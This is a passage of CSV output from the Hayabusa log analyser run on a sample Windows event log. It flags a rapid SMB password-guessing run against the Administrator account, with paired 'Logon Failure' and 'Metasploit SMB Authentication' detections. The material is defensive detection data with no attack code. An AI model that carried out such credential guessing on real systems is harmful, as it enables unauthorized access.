Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.045 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HfplQ16d7lsObzki : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.045 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.084 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c30ILHx5sYZCMflg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.084 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.127 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GMsJKiYmbgbr9wF0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.127 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.167 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q2hpQI6z68MVBzoW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.167 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.208 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iDgzJjXBnWDSVjdg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.208 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0XU5HdsnM0Lvpvq2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.252 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.290 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pjmtkv6JDb4s2WnR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.290 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I6mBM2WMWlKkQHZl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.328 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.372 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3jo7coI8uS8JCorc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.372 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.406 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1ao6QcPI3nzpNnHi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.406 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.444 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WkP8vstCEOH9wnUW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.444 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QzrhcYEue85zhZ8V : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.484 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.531 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ivpdjGaxoZOCTxbq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.531 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.572 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qIsZXHE4Swkbytiu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.572 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bdT2bVjtEd6KhQWf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.604 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.652 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RT9Tqp0lf0dd6h9C : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.652 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xwhlrl2ck1o2qTDy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.696 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.736 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lxX2762Fa804981t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.736 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O55rRqTo9vgwnYoq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.776 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.828 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zo7BzxXZDdykOXoZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.828 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.868 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6YGEMcvYtwNJys39 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.868 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.908 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V0xq8et2LwWSgVgk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.908 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 43EK0cGlZBhWRd5B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.956 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.996 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UBoGMdTjWVVVvifn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.996 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.038 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IcCrPXp3VLObGU6v : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.038 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zhZguuPimqAruiTu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.080 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.110 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5o6amdSWFFbueCyp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.110 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.152 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: W0wRaNXdhMlIY1HX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.152 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.192 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J8jqrrwWeKZGypW0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.192 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8LIavw2zakOP4DqU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.236 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.275 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qz7gr4vA633waQ01 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.275 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.325 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2TmHz5POLSNJHm2x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.325 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DcpOxhy2nnLIEGHT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.364 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.453 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gJxfDgfujy5Um2wa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.453 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 217VTq8EbYIDeSXU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.484 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WPfE1m0tsJAJnRt9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.524 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.564 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OQCfGhvBMSq3PIoa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.564 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.608 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XBl6JIRetWEnjaVx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.608 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.650 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KXJMNnj4LeBIYARt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.650 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v3sdn9f4xtvcsaHp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.680 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DWT0NepMYD29cOwh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.720 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.764 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DDb7wV6uzj1tat2d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.764 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.806 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RBcmANUL4a6DFobS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.806 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VL2swHF9MtnCfnp3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.841 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.883 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E0ZkcAD0IakqSUph : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.883 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.924 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5HgksdIGukmliZeE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.924 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.966 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xYoLckmmOWCSf4Q2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.966 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 